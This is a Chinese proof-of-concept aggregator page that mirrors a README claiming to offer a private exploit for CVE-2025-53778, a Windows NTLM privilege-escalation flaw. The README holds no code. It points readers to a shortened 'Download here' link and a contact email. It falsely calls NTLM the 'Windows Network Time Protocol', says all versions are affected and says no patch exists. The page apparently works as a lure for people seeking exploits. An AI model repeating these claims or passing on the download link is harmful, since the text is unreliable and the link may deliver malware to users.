支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 64e21c703ae100f06b0f4ce4633a1fbaeb355699

来源
关联漏洞
标题:Microsoft NTLM 授权问题漏洞 (CVE-2025-53778)
Description:Microsoft NTLM是美国微软(Microsoft)公司的一个在包括运行Windows操作系统的系统以及独立系统在内的网络上使用的身份验证协议。 Microsoft NTLM存在授权问题漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2,Windows Server 2008 for 32-
介绍
# CVE-2025-53778 - Improper Authentication (CWE-287) - Exploit

## Overview
Improper authentication vulnerability in Windows NTLM that allows an authorized attacker to elevate privileges over a network. The flaw is related to improper authentication mechanisms in the Windows Network Time Protocol (NTLM) authentication system.

## Exploit:
## [Download here](https://tinyurl.com/yc8zwaua)
## Details
+ **CVE ID**: CVE-2025-53778
+ **Published**: 08/12/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 8.8
+ **Patch Available:  (No official patch yet)**
## Impact
An attacker with low-level network access can potentially escalate privileges to SYSTEM level, gaining complete control over affected Windows systems. This could lead to: - Unauthorized access to confidential information - Ability to modify system configurations - Potential deployment of malware - Comprehensive system compromise


## Affected Versions
Windows Network Time Protocol (NTLM) all versions


## Contact
+ **For inquiries, please contact:nowkie221@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/yc8zwaua)


文件快照

[4.0K] /data/pocs/64e21c703ae100f06b0f4ce4633a1fbaeb355699 └── [1.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。